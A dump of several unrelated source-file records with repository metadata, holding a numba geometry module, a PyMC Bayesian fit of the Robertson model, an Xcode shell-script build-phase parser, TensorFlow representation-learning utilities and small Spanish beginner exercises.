mct = 1 - ct
# filling the matrix by indexing each element is faster (with jit)
# than writting np.array([[, , ], [, , ], [, , ]])
R = np.zeros((3, 3))
R[0, 0] = ct + x * x * mct
R[0, 1] = y * x * mct - z * st
R[0, 2] = x * z * mct + y * st
R[1, 0] = y * x * mct + z * st
R[1, 1] = ct + y * y * mct
R[1, 2] = y * z * mct - x * st
R[2, 0] = x * z * mct - y * st
R[2, 1] = y * z * mct + x * st
R[2, 2] = ct + z * z * mct
return R
@jit
def set_torsional(xyz, i, j, idx_rot, theta_rad):
"""
rotate a set of coordinates around the i-j axis by theta_rad
xyz: array
Cartesian coordinates
i: int
atom i
j: int
atom j
idx_to_rot: array
indices of the atoms that will be rotated
theta_rad: float
rotation angle in radians
"""
xyz_s = xyz - xyz[i]
R = rotation_matrix_3d((xyz_s[j]), theta_rad)
xyz[:] = xyz_s[:]
xyz[idx_rot] = xyz_s[idx_rot] @ R
# TODO return to original position????
| 22.384279 | 98 | 0.555989 | """
A collection of common mathematical functions written for high performance with
the help of numpy and numba.
"""
import numpy as np
from math import sin as msin
from math import cos as mcos
from numba import jit
@jit
def dist(p, q):
"""
Compute distance between two 3D vectors
p: array
Cartesian coordinates for one of the vectors
q: array
Cartesian coordinates for one of the vectors
"""
return ((p[0] - q[0])**2 + (p[1] - q[1])**2 + (p[2] - q[2])**2)**0.5
@jit
def dot(p, q):
"""
Compute dot product between two 3D vectors
p: array
Cartesian coordinates for one of the vectors
q: array
Cartesian coordinates for one of the vectors
"""
return p[0] * q[0] + p[1] * q[1] + p[2] * q[2]
@jit
def cross(p, q):
"""
Compute cross product between two 3D vectors
p: array
Cartesian coordinates for one of the vectors
q: array
Cartesian coordinates for one of the vectors
"""
xyz = np.zeros(3)
xyz[0] = p[1] * q[2] - p[2] * q[1]
xyz[1] = p[2] * q[0] - p[0] * q[2]
xyz[2] = p[0] * q[1] - p[1] * q[0]
return xyz
@jit
def mod(p):
"""
Compute modulus of 3D vector
p: array
Cartesian coordinates
"""
return (p[0]**2 + p[1]**2 + p[2]**2)**0.5
@jit
def normalize(p):
"""
Compute a normalized 3D vector
p: array
Cartesian coordinates
"""
return p / mod(p)
@jit
def perp_vector(p, q, r):
"""
Compute perpendicular vector to (p-q) and (r-q) centered in q.
"""
v = cross(q - r, q - p)
return v / mod(v) + q
def get_angle(a, b, c):
"""
Compute the angle given 3 points
xyz: array
Cartesian coordinates
a-c: int
atom index for the three points defining the angle
"""
ba = a - b
cb = c - b
ba_mod = mod(ba)
cb_mod = mod(cb)
val = dot(ba, cb) / (ba_mod * cb_mod)
# better fix?
if val > 1:
val = 1
elif val < -1:
val = -1
return np.arccos(val)
# this function is the same as get_torsional_array, except that the last one need an xyz-array and
# this one do not.
def get_torsional(a, b, c, d):
"""
Compute the torsional angle given four points
a-d: int
atom index for the four points defining the torsional
"""
# Compute 3 vectors connecting the four points
ba = b - a
cb = c - b
dc = d - c
# Compute the normal vector to each plane
u_A = cross(ba, cb)
u_B = cross(cb, dc)
#Measure the angle between the two normal vectors
u_A_mod = mod(u_A)
u_B_mod = mod(u_B)
val = dot(u_A, u_B) / (u_A_mod * u_B_mod)
# better fix?
if val > 1:
val = 1
elif val < -1:
val = -1
tor_rad = np.arccos(val)
# compute the sign
sign = dot(u_A, dc)
if sign > 0:
return tor_rad
else:
return -tor_rad
def get_torsional_array(xyz, a, b, c, d):
"""
Compute the torsional angle given four points
xyz: array
Cartesian coordinates
a-d: int
atom index for the four points defining the torsional
"""
# Compute 3 vectors connecting the four points
ba = xyz[b] - xyz[a]
cb = xyz[c] - xyz[b]
dc = xyz[d] - xyz[c]
# Compute the normal vector to each plane
u_A = cross(ba, cb)
u_B = cross(cb, dc)
# Measure the angle between the two normal vectors
u_A_mod = mod(u_A)
u_B_mod = mod(u_B)
val = dot(u_A, u_B) / (u_A_mod * u_B_mod)
# better fix?
if val > 1:
val = 1
elif val < -1:
val = -1
tor_rad = np.arccos(val)
# compute the sign
sign = dot(u_A, dc)
if sign > 0:
return tor_rad
else:
return -tor_rad
@jit
def rotation_matrix_3d(u, theta):
"""Return the rotation matrix due to a right hand rotation of theta radians
around an arbitrary axis/vector u.
u: array
arbitrary axis/vector u
theta: float
rotation angle in radians
"""
x, y, z = normalize(u)
st = msin(theta)
ct = mcos(theta)
mct = 1 - ct
# filling the matrix by indexing each element is faster (with jit)
# than writting np.array([[, , ], [, , ], [, , ]])
R = np.zeros((3, 3))
R[0, 0] = ct + x * x * mct
R[0, 1] = y * x * mct - z * st
R[0, 2] = x * z * mct + y * st
R[1, 0] = y * x * mct + z * st
R[1, 1] = ct + y * y * mct
R[1, 2] = y * z * mct - x * st
R[2, 0] = x * z * mct - y * st
R[2, 1] = y * z * mct + x * st
R[2, 2] = ct + z * z * mct
return R
@jit
def set_torsional(xyz, i, j, idx_rot, theta_rad):
"""
rotate a set of coordinates around the i-j axis by theta_rad
xyz: array
Cartesian coordinates
i: int
atom i
j: int
atom j
idx_to_rot: array
indices of the atoms that will be rotated
theta_rad: float
rotation angle in radians
"""
xyz_s = xyz - xyz[i]
R = rotation_matrix_3d((xyz_s[j]), theta_rad)
xyz[:] = xyz_s[:]
xyz[idx_rot] = xyz_s[idx_rot] @ R
# TODO return to original position????
| 0 | 0 | 0 |
8529c865f5483ed29537d0df2a81c1f23dd2e2c2 | 2,919 | py | Python | examples/pymc/robertson_pymc.py | johnbachman/bayessb | 0c4c4d57218edea2786616077600f07ed821337e | [
"BSD-2-Clause"
] | 1 | 2015-04-02T21:04:39.000Z | 2015-04-02T21:04:39.000Z | examples/pymc/robertson_pymc.py | LoLab-VU/bayessb | 0a21da7383e78ab1d9666f4faa9a57893aa31397 | [
"BSD-2-Clause"
] | null | null | null | examples/pymc/robertson_pymc.py | LoLab-VU/bayessb | 0a21da7383e78ab1d9666f4faa9a57893aa31397 | [
"BSD-2-Clause"
] | null | null | null | from pymc import deterministic, stochastic, MvNormal, Normal, Lognormal, Uniform, \
MCMC
import pymc
import numpy as np
from pysb.examples.robertson import model
from pysb.integrate import odesolve, Solver
from matplotlib import pyplot as plt
# Generate the synthetic data
seed = 2
random = np.random.RandomState(seed)
sigma = 0.1;
ntimes = 20;
tspan = np.linspace(0, 40, ntimes);
ysim = odesolve(model, tspan)
ysim_array = ysim.view(float).reshape(len(ysim), -1)
yspecies = ysim_array[:, :len(model.species)]
ydata = yspecies * (random.randn(*yspecies.shape) * sigma + 1);
ysim_max = yspecies.max(0)
ydata_norm = ydata / ysim_max
solver = Solver(model, tspan)
# Set up the parameter vector for the solver
nominal_rates = [model.parameters[n].value for n in ('A_0', 'B_0', 'C_0')]
# Stochastic variables for the rate parameters.
# Given lognormal priors with their correct order-of-mag mean but with a
# variance of 10 base 10 log units
k1 = Lognormal('k1', mu=np.log(1e-2), tau=1/(np.log(10)*np.log(1e10)),
value=1e-2, plot=True)
k2 = Lognormal('k2', mu=np.log(1e7), tau=1/(np.log(10)*np.log(1e10)),
value=1e7, plot=True)
k3 = Lognormal('k3', mu=np.log(1e4), tau=1/(np.log(10)*np.log(1e10)),
value=1e4, plot=True)
# The model is set up as a deterministic variable
@deterministic(plot=False)
# The precision (1/variance) matrix
tau = np.eye(len(tspan)*3) * 10
output = MvNormal('output', mu=robertson_model, tau=tau, observed=True,
value=ydata_norm.flatten())
if __name__ == '__main__':
# Create the MCMC object and start sampling
pymc_model = pymc.Model([k1, k2, k3, robertson_model, output])
mcmc = MCMC(pymc_model)
mcmc.sample(iter=10000, burn=5000, thin=5)
# Show the pymc histograms and autocorrelation plots
plt.ion()
pymc.Matplot.plot(mcmc)
plt.show()
# Plot the original data along with the sampled trajectories
plt.figure()
plt.plot(tspan, ydata_norm[:,0], 'r')
plt.plot(tspan, ydata_norm[:,1], 'g')
plt.plot(tspan, ydata_norm[:,2], 'b')
num_timecourses = 1000
num_iterations_sampled = mcmc.trace('robertson_model')[:].shape[0]
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,0::3].T, alpha=0.05, color='r')
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,1::3].T, alpha=0.05, color='g')
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,2::3].T, alpha=0.05, color='b')
# Show k1/k3 scatter plot
plt.figure()
plt.scatter(mcmc.trace('k1')[:], mcmc.trace('k3')[:])
| 36.4875 | 83 | 0.67112 | from pymc import deterministic, stochastic, MvNormal, Normal, Lognormal, Uniform, \
MCMC
import pymc
import numpy as np
from pysb.examples.robertson import model
from pysb.integrate import odesolve, Solver
from matplotlib import pyplot as plt
# Generate the synthetic data
seed = 2
random = np.random.RandomState(seed)
sigma = 0.1;
ntimes = 20;
tspan = np.linspace(0, 40, ntimes);
ysim = odesolve(model, tspan)
ysim_array = ysim.view(float).reshape(len(ysim), -1)
yspecies = ysim_array[:, :len(model.species)]
ydata = yspecies * (random.randn(*yspecies.shape) * sigma + 1);
ysim_max = yspecies.max(0)
ydata_norm = ydata / ysim_max
solver = Solver(model, tspan)
# Set up the parameter vector for the solver
nominal_rates = [model.parameters[n].value for n in ('A_0', 'B_0', 'C_0')]
# Stochastic variables for the rate parameters.
# Given lognormal priors with their correct order-of-mag mean but with a
# variance of 10 base 10 log units
k1 = Lognormal('k1', mu=np.log(1e-2), tau=1/(np.log(10)*np.log(1e10)),
value=1e-2, plot=True)
k2 = Lognormal('k2', mu=np.log(1e7), tau=1/(np.log(10)*np.log(1e10)),
value=1e7, plot=True)
k3 = Lognormal('k3', mu=np.log(1e4), tau=1/(np.log(10)*np.log(1e10)),
value=1e4, plot=True)
# The model is set up as a deterministic variable
@deterministic(plot=False)
def robertson_model(k1=k1, k2=k2, k3=k3):
solver.run(np.concatenate((np.array([k1, k2, k3]), nominal_rates)))
yout = solver.y / ysim_max # Normalize the simulation
return yout.flatten()
# The precision (1/variance) matrix
tau = np.eye(len(tspan)*3) * 10
output = MvNormal('output', mu=robertson_model, tau=tau, observed=True,
value=ydata_norm.flatten())
if __name__ == '__main__':
# Create the MCMC object and start sampling
pymc_model = pymc.Model([k1, k2, k3, robertson_model, output])
mcmc = MCMC(pymc_model)
mcmc.sample(iter=10000, burn=5000, thin=5)
# Show the pymc histograms and autocorrelation plots
plt.ion()
pymc.Matplot.plot(mcmc)
plt.show()
# Plot the original data along with the sampled trajectories
plt.figure()
plt.plot(tspan, ydata_norm[:,0], 'r')
plt.plot(tspan, ydata_norm[:,1], 'g')
plt.plot(tspan, ydata_norm[:,2], 'b')
num_timecourses = 1000
num_iterations_sampled = mcmc.trace('robertson_model')[:].shape[0]
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,0::3].T, alpha=0.05, color='r')
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,1::3].T, alpha=0.05, color='g')
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,2::3].T, alpha=0.05, color='b')
# Show k1/k3 scatter plot
plt.figure()
plt.scatter(mcmc.trace('k1')[:], mcmc.trace('k3')[:])
| 176 | 0 | 22 |
040444bcd04f4b65f9da89ffa08d0cc4db3aac35 | 2,818 | py | Python | xcparse/Xcode/PBX/PBXShellScriptBuildPhase.py | samdmarshall/xcparser | 4f78af149127325e60e3785b6e09d6dbfeedc799 | [
"BSD-3-Clause"
] | 59 | 2015-02-27T21:45:37.000Z | 2021-03-16T04:37:40.000Z | xcparse/Xcode/PBX/PBXShellScriptBuildPhase.py | samdmarshall/xcparser | 4f78af149127325e60e3785b6e09d6dbfeedc799 | [
"BSD-3-Clause"
] | 14 | 2015-03-02T18:53:51.000Z | 2016-07-19T23:20:23.000Z | xcparse/Xcode/PBX/PBXShellScriptBuildPhase.py | samdmarshall/xcparser | 4f78af149127325e60e3785b6e09d6dbfeedc799 | [
"BSD-3-Clause"
] | 8 | 2015-03-02T02:32:09.000Z | 2017-07-31T21:14:51.000Z | from .PBXResolver import *
from .PBX_Base_Phase import *
from .PBX_Constants import *
from ...Helpers import logging_helper
from ...Helpers import xcrun_helper
from ...Helpers import path_helper | 46.966667 | 144 | 0.66572 | from .PBXResolver import *
from .PBX_Base_Phase import *
from .PBX_Constants import *
from ...Helpers import logging_helper
from ...Helpers import xcrun_helper
from ...Helpers import path_helper
class PBXShellScriptBuildPhase(PBX_Base_Phase):
def __init__(self, lookup_func, dictionary, project, identifier):
super(PBXShellScriptBuildPhase, self).__init__(lookup_func, dictionary, project, identifier);
self.bundleid = 'com.apple.buildphase.shell-script';
self.phase_type = 'Run Shell Script';
if kPBX_PHASE_shellScript in dictionary.keys():
self.shellScript = str(dictionary[kPBX_PHASE_shellScript]);
if kPBX_PHASE_shellPath in dictionary.keys():
self.shellPath = str(dictionary[kPBX_PHASE_shellPath]);
if kPBX_PHASE_inputPaths in dictionary.keys():
inputPaths = [];
for inputPath in dictionary[kPBX_PHASE_inputPaths]:
inputPaths.append(inputPath);
self.inputPaths = inputPaths;
if kPBX_PHASE_outputPaths in dictionary.keys():
outputPaths = [];
for outputPath in dictionary[kPBX_PHASE_outputPaths]:
outputPaths.append(outputPath);
self.outputPaths = outputPaths;
self.showEnvVarsInLog = 1;
if kPBX_PHASE_showEnvVarsInLog in dictionary.keys():
self.showEnvVarsInLog = dictionary[kPBX_PHASE_showEnvVarsInLog];
def performPhase(self, build_system, target):
phase_spec = build_system.getSpecForIdentifier(self.bundleid);
print '%s Phase: %s' % (self.phase_type, phase_spec.name);
print '* %s' % (phase_spec.contents['Description']);
resolved_values = build_system.environment.resolvedValues();
config_name = build_system.environment.valueForKey('CONFIGURATION', lookup_dict=resolved_values);
symroot = build_system.environment.valueForKey('SYMROOT', lookup_dict=resolved_values);
script_dir_path = xcrun_helper.IntermediatesBuildLocation(target.project_container.rootObject, target.name.value, config_name, symroot);
path_helper.create_directories(script_dir_path);
script_path = os.path.join(script_dir_path, str('Script-'+self.identifier+'.sh'));
fd = open(script_path, 'w');
env = '#!' + self.shellPath
print >> fd, env;
print >> fd, self.shellScript;
fd.close();
if self.showEnvVarsInLog == 1:
for export_item in build_system.environment.exportValues():
print '\t'+export_item;
# this needs to export the environment variables
print '/bin/sh -c '+script_path;
# print xcrun_helper.make_subprocess_call(('/bin/sh','-c', script_path));
print ''; | 2,513 | 26 | 85 |
5a2c7ea488a79c7bc3ca61ffc7923ed29c059cad | 181 | py | Python | EstruturaSequencial/03.py | TheCarvalho/atividades-wikipython | 9163d5de40dbed0d73917f6257e64a651a77e085 | [
"Unlicense"
] | null | null | null | EstruturaSequencial/03.py | TheCarvalho/atividades-wikipython | 9163d5de40dbed0d73917f6257e64a651a77e085 | [
"Unlicense"
] | null | null | null | EstruturaSequencial/03.py | TheCarvalho/atividades-wikipython | 9163d5de40dbed0d73917f6257e64a651a77e085 | [
"Unlicense"
] | null | null | null | '''
3. Faça um Programa que peça dois números e imprima a soma.
'''
num1 = int(input('Insira o primeiro número: '))
num2 = int(input('Insira o segundo número: '))
print(num1+num2)
| 22.625 | 59 | 0.685083 | '''
3. Faça um Programa que peça dois números e imprima a soma.
'''
num1 = int(input('Insira o primeiro número: '))
num2 = int(input('Insira o segundo número: '))
print(num1+num2)
| 0 | 0 | 0 |
a287fa8fd1aa9340094407b9ff28c613564df1de | 8,205 | py | Python | utils.py | kristinakupf/revisiting-self-supervised | 1eac8a76c1b002d74b4b2983739d2e0280f5a09c | [
"Apache-2.0"
] | 360 | 2019-01-25T17:59:18.000Z | 2022-02-23T22:21:51.000Z | utils.py | kristinakupf/revisiting-self-supervised | 1eac8a76c1b002d74b4b2983739d2e0280f5a09c | [
"Apache-2.0"
] | 7 | 2019-02-05T15:09:31.000Z | 2021-11-13T21:08:08.000Z | utils.py | rickyHong/Puzzle-tensorflow-latest-repl | 86315b94bb8652eff37c5cd27459eae414d9143e | [
"Apache-2.0"
] | 44 | 2019-01-28T02:05:31.000Z | 2021-09-19T09:34:27.000Z | #!/usr/bin/python
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Util functions for representation learning.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import re
import numpy as np
import tensorflow as tf
INPUT_DATA_STR = "input_data"
IS_TRAINING_STR = "is_training"
REPR_PREFIX_STR = "representation_"
TAGS_IS_TRAINING = ["is_training"]
def adaptive_pool(inp, num_target_dimensions=9000, mode="adaptive_max"):
"""Adaptive pooling layer.
This layer performs adaptive pooling, such that the total
dimensionality of output is not bigger than num_target_dimension
Args:
inp: input tensor
num_target_dimensions: maximum number of output dimensions
mode: one of {"adaptive_max", "adaptive_avg", "max", "avg"}
Returns:
Result of the pooling operation
Raises:
ValueError: mode is unexpected.
"""
size, _, k = inp.get_shape().as_list()[1:]
if mode in ["adaptive_max", "adaptive_avg"]:
if mode == "adaptive_max":
pool_fn = tf.nn.fractional_max_pool
else:
pool_fn = tf.nn.fractional_avg_pool
# Find the optimal target output tensor size
target_size = (num_target_dimensions / float(k)) ** 0.5
if (abs(num_target_dimensions - k * np.floor(target_size) ** 2) <
abs(num_target_dimensions - k * np.ceil(target_size) ** 2)):
target_size = max(np.floor(target_size), 1.0)
else:
target_size = max(np.ceil(target_size), 1.0)
# Get optimal stride. Subtract epsilon to ensure correct rounding in
# pool_fn.
stride = size / target_size - 1.0e-5
# Make sure that the stride is valid
stride = max(stride, 1)
stride = min(stride, size)
result = pool_fn(inp, [1, stride, stride, 1])[0]
elif mode in ["max", "avg"]:
if mode == "max":
pool_fn = tf.contrib.layers.max_pool2d
else:
pool_fn = tf.contrib.layers.avg_pool2d
total_size = float(np.prod(inp.get_shape()[1:].as_list()))
stride = int(np.ceil(np.sqrt(total_size / num_target_dimensions)))
stride = min(max(1, stride), size)
result = pool_fn(inp, kernel_size=stride, stride=stride)
else:
raise ValueError("Not supported %s pool." % mode)
return result
def append_multiple_rows_to_csv(dictionaries, csv_path):
"""Writes multiples rows to csv file from a list of dictionaries.
Args:
dictionaries: a list of dictionaries, mapping from csv header to value.
csv_path: path to the result csv file.
"""
keys = set([])
for d in dictionaries:
keys.update(d.keys())
if not tf.gfile.Exists(csv_path):
with tf.gfile.Open(csv_path, "w") as f:
writer = csv.DictWriter(f, sorted(keys))
writer.writeheader()
f.flush()
with tf.gfile.Open(csv_path, "a") as f:
writer = csv.DictWriter(f, sorted(keys))
writer.writerows(dictionaries)
f.flush()
def concat_dicts(dict_list):
"""Given a list of dicts merges them into a single dict.
This function takes a list of dictionaries as an input and then merges all
these dictionaries into a single dictionary by concatenating the values
(along the first axis) that correspond to the same key.
Args:
dict_list: list of dictionaries
Returns:
d: merged dictionary
"""
d = collections.defaultdict(list)
for e in dict_list:
for k, v in e.items():
d[k].append(v)
for k in d:
d[k] = tf.concat(d[k], axis=0)
return d
def str2intlist(s, repeats_if_single=None):
"""Parse a config's "1,2,3"-style string into a list of ints.
Args:
s: The string to be parsed, or possibly already an int.
repeats_if_single: If s is already an int or is a single element list,
repeat it this many times to create the list.
Returns:
A list of integers based on `s`.
"""
if isinstance(s, int):
result = [s]
else:
result = [int(i.strip()) if i != "None" else None
for i in s.split(",")]
if repeats_if_single is not None and len(result) == 1:
result *= repeats_if_single
return result
def tf_apply_to_image_or_images(fn, image_or_images):
"""Applies a function to a single image or each image in a batch of them.
Args:
fn: the function to apply, receives an image, returns an image.
image_or_images: Either a single image, or a batch of images.
Returns:
The result of applying the function to the image or batch of images.
Raises:
ValueError: if the input is not of rank 3 or 4.
"""
static_rank = len(image_or_images.get_shape().as_list())
if static_rank == 3: # A single image: HWC
return fn(image_or_images)
elif static_rank == 4: # A batch of images: BHWC
return tf.map_fn(fn, image_or_images)
elif static_rank > 4: # A batch of images: ...HWC
input_shape = tf.shape(image_or_images)
h, w, c = image_or_images.get_shape().as_list()[-3:]
image_or_images = tf.reshape(image_or_images, [-1, h, w, c])
image_or_images = tf.map_fn(fn, image_or_images)
return tf.reshape(image_or_images, input_shape)
else:
raise ValueError("Unsupported image rank: %d" % static_rank)
def tf_apply_with_probability(p, fn, x):
"""Apply function `fn` to input `x` randomly `p` percent of the time."""
return tf.cond(
tf.less(tf.random_uniform([], minval=0, maxval=1, dtype=tf.float32), p),
lambda: fn(x),
lambda: x)
def get_latest_hub_per_task(hub_module_paths):
"""Get latest hub module for each task.
The hub module path should match format ".*/hub/[0-9]*/module/.*".
Example usage:
get_latest_hub_per_task(expand_glob(["/cns/el-d/home/dune/representation/"
"xzhai/1899361/*/export/hub/*/module/"]))
returns 4 latest hub module from 4 tasks respectivley.
Args:
hub_module_paths: a list of hub module paths.
Returns:
A list of latest hub modules for each task.
"""
task_to_path = {}
for path in hub_module_paths:
task_name, module_name = path.split("/hub/")
timestamp = int(re.findall(r"([0-9]*)/module", module_name)[0])
current_path = task_to_path.get(task_name, "0/module")
current_timestamp = int(re.findall(r"([0-9]*)/module", current_path)[0])
if current_timestamp < timestamp:
task_to_path[task_name] = path
return sorted(task_to_path.values())
def get_classification_metrics(tensor_names):
"""Gets classification eval metric on input logits and labels.
Args:
tensor_names: a list of tensor names for _metrics input tensors.
Returns:
A function computes the metric result, from input logits and labels.
"""
def _metrics(labels, *tensors):
"""Computes the metric from logits and labels.
Args:
labels: ground truth labels.
*tensors: tensors to be evaluated.
Returns:
Result dict mapping from the metric name to the list of result tensor and
update_op used by tf.metrics.
"""
metrics = {}
assert len(tensor_names) == len(tensors), "Names must match tensors."
for i in range(len(tensors)):
tensor = tensors[i]
name = tensor_names[i]
for k in (1, 5):
metrics["top%d_accuracy_%s" % (k, name)] = _top_k_accuracy(
k, labels, tensor)
return metrics
return _metrics
| 30.276753 | 80 | 0.686776 | #!/usr/bin/python
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Util functions for representation learning.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import re
import numpy as np
import tensorflow as tf
INPUT_DATA_STR = "input_data"
IS_TRAINING_STR = "is_training"
REPR_PREFIX_STR = "representation_"
TAGS_IS_TRAINING = ["is_training"]
def adaptive_pool(inp, num_target_dimensions=9000, mode="adaptive_max"):
"""Adaptive pooling layer.
This layer performs adaptive pooling, such that the total
dimensionality of output is not bigger than num_target_dimension
Args:
inp: input tensor
num_target_dimensions: maximum number of output dimensions
mode: one of {"adaptive_max", "adaptive_avg", "max", "avg"}
Returns:
Result of the pooling operation
Raises:
ValueError: mode is unexpected.
"""
size, _, k = inp.get_shape().as_list()[1:]
if mode in ["adaptive_max", "adaptive_avg"]:
if mode == "adaptive_max":
pool_fn = tf.nn.fractional_max_pool
else:
pool_fn = tf.nn.fractional_avg_pool
# Find the optimal target output tensor size
target_size = (num_target_dimensions / float(k)) ** 0.5
if (abs(num_target_dimensions - k * np.floor(target_size) ** 2) <
abs(num_target_dimensions - k * np.ceil(target_size) ** 2)):
target_size = max(np.floor(target_size), 1.0)
else:
target_size = max(np.ceil(target_size), 1.0)
# Get optimal stride. Subtract epsilon to ensure correct rounding in
# pool_fn.
stride = size / target_size - 1.0e-5
# Make sure that the stride is valid
stride = max(stride, 1)
stride = min(stride, size)
result = pool_fn(inp, [1, stride, stride, 1])[0]
elif mode in ["max", "avg"]:
if mode == "max":
pool_fn = tf.contrib.layers.max_pool2d
else:
pool_fn = tf.contrib.layers.avg_pool2d
total_size = float(np.prod(inp.get_shape()[1:].as_list()))
stride = int(np.ceil(np.sqrt(total_size / num_target_dimensions)))
stride = min(max(1, stride), size)
result = pool_fn(inp, kernel_size=stride, stride=stride)
else:
raise ValueError("Not supported %s pool." % mode)
return result
def append_multiple_rows_to_csv(dictionaries, csv_path):
"""Writes multiples rows to csv file from a list of dictionaries.
Args:
dictionaries: a list of dictionaries, mapping from csv header to value.
csv_path: path to the result csv file.
"""
keys = set([])
for d in dictionaries:
keys.update(d.keys())
if not tf.gfile.Exists(csv_path):
with tf.gfile.Open(csv_path, "w") as f:
writer = csv.DictWriter(f, sorted(keys))
writer.writeheader()
f.flush()
with tf.gfile.Open(csv_path, "a") as f:
writer = csv.DictWriter(f, sorted(keys))
writer.writerows(dictionaries)
f.flush()
def concat_dicts(dict_list):
"""Given a list of dicts merges them into a single dict.
This function takes a list of dictionaries as an input and then merges all
these dictionaries into a single dictionary by concatenating the values
(along the first axis) that correspond to the same key.
Args:
dict_list: list of dictionaries
Returns:
d: merged dictionary
"""
d = collections.defaultdict(list)
for e in dict_list:
for k, v in e.items():
d[k].append(v)
for k in d:
d[k] = tf.concat(d[k], axis=0)
return d
def str2intlist(s, repeats_if_single=None):
"""Parse a config's "1,2,3"-style string into a list of ints.
Args:
s: The string to be parsed, or possibly already an int.
repeats_if_single: If s is already an int or is a single element list,
repeat it this many times to create the list.
Returns:
A list of integers based on `s`.
"""
if isinstance(s, int):
result = [s]
else:
result = [int(i.strip()) if i != "None" else None
for i in s.split(",")]
if repeats_if_single is not None and len(result) == 1:
result *= repeats_if_single
return result
def tf_apply_to_image_or_images(fn, image_or_images):
"""Applies a function to a single image or each image in a batch of them.
Args:
fn: the function to apply, receives an image, returns an image.
image_or_images: Either a single image, or a batch of images.
Returns:
The result of applying the function to the image or batch of images.
Raises:
ValueError: if the input is not of rank 3 or 4.
"""
static_rank = len(image_or_images.get_shape().as_list())
if static_rank == 3: # A single image: HWC
return fn(image_or_images)
elif static_rank == 4: # A batch of images: BHWC
return tf.map_fn(fn, image_or_images)
elif static_rank > 4: # A batch of images: ...HWC
input_shape = tf.shape(image_or_images)
h, w, c = image_or_images.get_shape().as_list()[-3:]
image_or_images = tf.reshape(image_or_images, [-1, h, w, c])
image_or_images = tf.map_fn(fn, image_or_images)
return tf.reshape(image_or_images, input_shape)
else:
raise ValueError("Unsupported image rank: %d" % static_rank)
def tf_apply_with_probability(p, fn, x):
"""Apply function `fn` to input `x` randomly `p` percent of the time."""
return tf.cond(
tf.less(tf.random_uniform([], minval=0, maxval=1, dtype=tf.float32), p),
lambda: fn(x),
lambda: x)
def expand_glob(glob_patterns):
checkpoints = []
for pattern in glob_patterns:
checkpoints.extend(tf.gfile.Glob(pattern))
assert checkpoints, "There are no checkpoints in " + str(glob_patterns)
return checkpoints
def get_latest_hub_per_task(hub_module_paths):
"""Get latest hub module for each task.
The hub module path should match format ".*/hub/[0-9]*/module/.*".
Example usage:
get_latest_hub_per_task(expand_glob(["/cns/el-d/home/dune/representation/"
"xzhai/1899361/*/export/hub/*/module/"]))
returns 4 latest hub module from 4 tasks respectivley.
Args:
hub_module_paths: a list of hub module paths.
Returns:
A list of latest hub modules for each task.
"""
task_to_path = {}
for path in hub_module_paths:
task_name, module_name = path.split("/hub/")
timestamp = int(re.findall(r"([0-9]*)/module", module_name)[0])
current_path = task_to_path.get(task_name, "0/module")
current_timestamp = int(re.findall(r"([0-9]*)/module", current_path)[0])
if current_timestamp < timestamp:
task_to_path[task_name] = path
return sorted(task_to_path.values())
def get_classification_metrics(tensor_names):
"""Gets classification eval metric on input logits and labels.
Args:
tensor_names: a list of tensor names for _metrics input tensors.
Returns:
A function computes the metric result, from input logits and labels.
"""
def _top_k_accuracy(k, labels, logits):
in_top_k = tf.nn.in_top_k(predictions=logits, targets=labels, k=k)
return tf.metrics.mean(tf.cast(in_top_k, tf.float32))
def _metrics(labels, *tensors):
"""Computes the metric from logits and labels.
Args:
labels: ground truth labels.
*tensors: tensors to be evaluated.
Returns:
Result dict mapping from the metric name to the list of result tensor and
update_op used by tf.metrics.
"""
metrics = {}
assert len(tensor_names) == len(tensors), "Names must match tensors."
for i in range(len(tensors)):
tensor = tensors[i]
name = tensor_names[i]
for k in (1, 5):
metrics["top%d_accuracy_%s" % (k, name)] = _top_k_accuracy(
k, labels, tensor)
return metrics
return _metrics
| 350 | 0 | 48 |
ea960da13a754b1b5f178921b94293782175191a | 2,046 | py | Python | Taller_Estructuras_de _Control_Selectivas/Ejercicio_15.py | Mariajosedibo19/Talleres_de_Algoritmos | db8f1eecc345be1877d9d7a62a3fa8cf3af2df7d | [
"MIT"
] | null | null | null | Taller_Estructuras_de _Control_Selectivas/Ejercicio_15.py | Mariajosedibo19/Talleres_de_Algoritmos | db8f1eecc345be1877d9d7a62a3fa8cf3af2df7d | [
"MIT"
] | null | null | null | Taller_Estructuras_de _Control_Selectivas/Ejercicio_15.py | Mariajosedibo19/Talleres_de_Algoritmos | db8f1eecc345be1877d9d7a62a3fa8cf3af2df7d | [
"MIT"
] | null | null | null | """
Datos de entrada
edad del paciente = edad = int
sexo del paciente = sexo_paciente = int
Datos de salida
Resultado positivo o negativo acerca de si el paciente tiene anemia = resultado = str
"""
# Entradas
edad_paciente=int(input("Inserte la edad del paciente en su equivalente de años a meses "))
sexo_paciente=str(input("Inserte su sexo de la siguiente manera , femenino (F) o masculino (M) "))
nivel_hemoglobina=float(input("Inserte cual fue el resultado del nivel de hemoglobina en la sangre "))
sexo= sexo_paciente[0] # Es la posicion del caracter que quiero que tome
# Caja Negra
resultado=''
